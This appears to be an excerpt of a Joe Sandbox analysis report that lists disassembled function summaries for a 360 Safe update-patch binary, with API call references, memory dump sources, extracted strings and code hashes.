                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,00B9335B,?,00000064), ref: 00B92645
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B9267A
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00B926A2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B926BA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B92708
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                              • API String ID: 3752575622-2935326385
                                                                                                                                                                                                              • Opcode ID: cab2560c468fec0bdd8a3a2e0ba8467dc8443fced5510f6d97e4fed11af7c318
                                                                                                                                                                                                              • Instruction ID: cb28932883379b66303a534799f414c5691e130b587a82f1438c0843aa35808c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cab2560c468fec0bdd8a3a2e0ba8467dc8443fced5510f6d97e4fed11af7c318
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7418D71504340ABE724DF68DC86EAFB3E8EFC9700F400D6DF59893181EB7499458B62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$_memsetbindhtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2989883027-0
                                                                                                                                                                                                              • Opcode ID: 8b240aa60a612fdc7a044f5149b5bb28e4da8c41158fb9e57686332c86ff2253
                                                                                                                                                                                                              • Instruction ID: 6261ef26074cec9cd9e63f6bc604ad63e0292ba33e32da6978e0146a6a91c2a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b240aa60a612fdc7a044f5149b5bb28e4da8c41158fb9e57686332c86ff2253
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C117732950219AAEF00DBB4CC45BAE7774AF11750F404596F511E61E0D7B8DA14CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00B1E084
                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00B1E0AA
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0022204C,00000000,00000004,00000000,00000004,00000000,00000000), ref: 00B1E0DA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B1E0E3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                                                              • String ID: \\.\360SelfProtection
                                                                                                                                                                                                              • API String ID: 3778458602-936859468
                                                                                                                                                                                                              • Opcode ID: 8d6b227864b9369c34440a4d52942a08137019cc2b45ccb73828ee706932e6b8
                                                                                                                                                                                                              • Instruction ID: 2434cbf576b5cb587106ddd91f46ccf39de467f25ba3137426d5a9fb8f8bc87e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d6b227864b9369c34440a4d52942a08137019cc2b45ccb73828ee706932e6b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0A931744310BBE2119754EC06F6E7BA4ABC8F11F440618FB94A71D0D7B4A608C7A7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B80152
                                                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 00B80163
                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 00B80174
                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00B80180
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00B8018B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3046278646-0
                                                                                                                                                                                                              • Opcode ID: 59e36afb0c7abe5b8f0ffe2276911a941cd0bbf542e03d09fd92a4999c1c7909
                                                                                                                                                                                                              • Instruction ID: dba4878be9da4d713df398fd98cfb6d79e376aedaee0022df41488136cdb0b16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59e36afb0c7abe5b8f0ffe2276911a941cd0bbf542e03d09fd92a4999c1c7909
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF09072601305BFDB126FA5EC08E5B7FA8FF497A1F004024F91897120DB31D861DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdaptersCountInfoTick_sprintf
                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                              • API String ID: 3280268689-436463671
                                                                                                                                                                                                              • Opcode ID: 60edd50907fa7a0f4acd48a66fc6165ae1f8da63333ad6af03f033b52dbbdd3b
                                                                                                                                                                                                              • Instruction ID: 07375db65bba9a5967532bca32bd98e935bc3d99559cc198f354f355d7c1aabd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60edd50907fa7a0f4acd48a66fc6165ae1f8da63333ad6af03f033b52dbbdd3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00112972A442948BDB648FB8CC957EEB7FC9F0A348F2014ADD846D7241EB7895079B60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindhtonl
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2721747176-0
                                                                                                                                                                                                              • Opcode ID: d585bb50ee3a996061f2202fc6d6b187ce26c9b119c02198c73ce4accf85f450
                                                                                                                                                                                                              • Instruction ID: c3491fa8a263aabbe32eee21ba852e498a3f56a37f46c5fe85b2d114b9daba39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d585bb50ee3a996061f2202fc6d6b187ce26c9b119c02198c73ce4accf85f450
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFF03076A2020AAFDF40DFB8C912FAF77B5EF15710F404466E802E71A0D774DA049791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: listen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3257165821-0
                                                                                                                                                                                                              • Opcode ID: 28d74ebe726d56a8fe5d021f360d327c048693722057a8e05dba7860e0f9fe70
                                                                                                                                                                                                              • Instruction ID: 66ec7a1a633cc91e087bcff4c3c3c1583b1b9ebceffcadf8d678245f7337b74b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d74ebe726d56a8fe5d021f360d327c048693722057a8e05dba7860e0f9fe70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DD0C972264100DFD7429F60C644A2077B5FF5A71AF2085ECA14D8A1B2C732C867DF00

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF26DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,LogLevel,00000000,?,?,?,?,6BF8AC78), ref: 6BF26FE4
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,DnsProxy,00000000,?,?,?,?,6BF8AC78), ref: 6BF27010
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,TFWRate,00000000,?,?,?,?,6BF8AC78), ref: 6BF2703C
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,Intranet,00000000,?,?,?,?,6BF8AC78), ref: 6BF27068
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,ProxyUpdateDate,00000000,?,?,?,?,6BF8AC78), ref: 6BF2709C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$Open
                                                                                                                                                                                                              • String ID: ,%s,$,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$360sdUpd,360tray,360leakfixer,360safe,SoftManager,360netcfg,seup,360EntClient,SoftMgr,Sdis$DnsProxy$Intranet$LogLevel$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$Nat$NatUpdate$NatWLan$PeerNumPerS$ProxyUpdateDate$TFWRate$UseEntModuleList
                                                                                                                                                                                                              • API String ID: 1606891134-779865806
                                                                                                                                                                                                              • Opcode ID: 7fe16b7db5fb866031b0e0b375e18b8269d3b6be586f53c028a2c785ba7f4874
                                                                                                                                                                                                              • Instruction ID: 1e0256fac5cb83adbdc011bebe4fd8414cc08040c225546e191b22337a0765f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fe16b7db5fb866031b0e0b375e18b8269d3b6be586f53c028a2c785ba7f4874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB168B2D1161CAEDB11DFE5CC80DDEB7BCFB09744B20422AE915E7211E7369A058F60

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s\360Safe\LiveUpdateLog\P2SP%s.log, xrefs: 6BF11C43
                                                                                                                                                                                                              • competition, xrefs: 6BF11CDB
                                                                                                                                                                                                              • p2sp init %s, xrefs: 6BF11CCC
                                                                                                                                                                                                              • 360P2SP.dll, xrefs: 6BF11C98
                                                                                                                                                                                                              • SOFTWARE\360Safe\Leak, xrefs: 6BF11CE0
                                                                                                                                                                                                              • liveupdate360, xrefs: 6BF11B9B
                                                                                                                                                                                                              • [CTaskMgr::__init_global_vars] Loglevel:%u DnsProxy_enable:%u TFWRate:%d ProxyUpdateDate:%u, xrefs: 6BF11D0C
                                                                                                                                                                                                              • LSPKeepCloseNum:%d IsLSPMode:%d, xrefs: 6BF11D40
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsrchr$_memset$FileModuleName_wcslen$ClosePathQueryTempValue
                                                                                                                                                                                                              • String ID: %s\360Safe\LiveUpdateLog\P2SP%s.log$360P2SP.dll$LSPKeepCloseNum:%d IsLSPMode:%d$SOFTWARE\360Safe\Leak$[CTaskMgr::__init_global_vars] Loglevel:%u DnsProxy_enable:%u TFWRate:%d ProxyUpdateDate:%u$competition$liveupdate360$p2sp init %s
                                                                                                                                                                                                              • API String ID: 1602246604-1275363313
                                                                                                                                                                                                              • Opcode ID: 0e10721624ffc30c2693caf05ec1c9a5141d8318d33b82489c110ab5a2149493
                                                                                                                                                                                                              • Instruction ID: e87fae8c8a29eea847e0bbacfc7aab48c68977bcd7a37562927348f0be29100d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e10721624ffc30c2693caf05ec1c9a5141d8318d33b82489c110ab5a2149493
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97B191B3414199AADF61DFB4CC81EEE37ACEF15308F00056AF905D61A0EB399648C7A2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD0E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD47
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD76
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECD91
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECDA8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEECDC3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, error code is %d, xrefs: 6BEECAFB
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, parameter nNumber must greater than zero, xrefs: 6BEEC9D2, 6BEECA0A, 6BEECA3D, 6BEECA79
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, parameter pBuffer can not be NULL, xrefs: 6BEEC99E
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, open file fail, error code is %d, xrefs: 6BEECBB0
                                                                                                                                                                                                              • [%d.] exception raised in method CFileMgr::SetMemFile, read from file fail(call WriteFile), error code is %d, xrefs: 6BEECD17, 6BEECD50, 6BEECD7F, 6BEECDB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.] exception raised in method CFileMgr::SetMemFile, error code is %d$[%d.] exception raised in method CFileMgr::SetMemFile, open file fail, error code is %d$[%d.] exception raised in method CFileMgr::SetMemFile, parameter nNumber must greater than zero$[%d.] exception raised in method CFileMgr::SetMemFile, parameter pBuffer can not be NULL$[%d.] exception raised in method CFileMgr::SetMemFile, read from file fail(call WriteFile), error code is %d

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF0C7DF
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0C85B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0C964
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: _memset.LIBCMT ref: 6BF24102
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF2411D
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                                • Part of subcall function 6BEED55B: _wcslen.LIBCMT ref: 6BEED562
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • .P2P, xrefs: 6BF0C9B6
                                                                                                                                                                                                              • [%d.] AppName=%s IsSkipEnt:%d, xrefs: 6BF0CAEE
                                                                                                                                                                                                              • [%d.] EntModuleList=%s, xrefs: 6BF0CACB
                                                                                                                                                                                                              • ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,, xrefs: 6BF0CA7A, 6BF0CAC3
                                                                                                                                                                                                              • 360tray, xrefs: 6BF0CB2E
                                                                                                                                                                                                              • [%d.] Delete mem File, xrefs: 6BF0CFA3
                                                                                                                                                                                                              • [%d.] discard resume mem, xrefs: 6BF0CFD7
                                                                                                                                                                                                              • [%d.] URL = %s File=%s, xrefs: 6BF0C97D
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s) PDownURL = %s, xrefs: 6BF0CA05
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), xrefs: 6BF0CDC9
                                                                                                                                                                                                              • [%d.] DUQuota = %d Liveupdate360:%d, xrefs: 6BF0CC5C
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), xrefs: 6BF0CD62
                                                                                                                                                                                                              • [%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d, xrefs: 6BF0CAB8
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), , xrefs: 6BF0CEF2
                                                                                                                                                                                                              • [%d.] FileName=%s ErrorCode= %d(%s), xrefs: 6BF0CF51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcslenwvnsprintf$CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$.P2P$360tray$[%d.] AppName=%s IsSkipEnt:%d$[%d.] DUQuota = %d Liveupdate360:%d$[%d.] Delete mem File$[%d.] EntModuleList=%s$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s) PDownURL = %s$[%d.] ErrorCode = %d(%s), $[%d.] FileName=%s ErrorCode= %d(%s)$[%d.] URL = %s File=%s$[%d.] discard resume mem$[%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E0F7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E11A
                                                                                                                                                                                                              • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 00B7E13C
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 00B7E186
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00B7E18F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E1DE
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 00B7E1F5
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 00B7E203
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 00B7E214
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 00B7E274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 00B7E281
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E2C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
                                                                                                                                                                                                              • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                                                              • API String ID: 2656314946-96710800
                                                                                                                                                                                                              • Opcode ID: 969e44c32ccbdca17e811fd06abbb24dedcd7c3e59eb7718e7e4669a5264172c
                                                                                                                                                                                                              • Instruction ID: 61c482d6ae88a10569e53c5cb4c58600e819d81885b7a5eb1a6bb2e43f08f6eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 969e44c32ccbdca17e811fd06abbb24dedcd7c3e59eb7718e7e4669a5264172c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D6129759002499BDB21EFA4DC85EEF77FDEF48700F0044AAE96997181EB70E644CB50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(AA5945B3,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6E84
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BEE6E9B
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6EB5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6EC8
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6ED8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEE6EF4
                                                                                                                                                                                                              • _swscanf.LIBCMT ref: 6BEE6F2B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6F45
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,?,?,?,?,6BF5E70B), ref: 6BEE6F57
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE6F92
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 6BEE6FA9
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE6FD0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,6BF7CAE8), ref: 6BEE6FDE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7000
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 6BEE7023
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BEE702E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
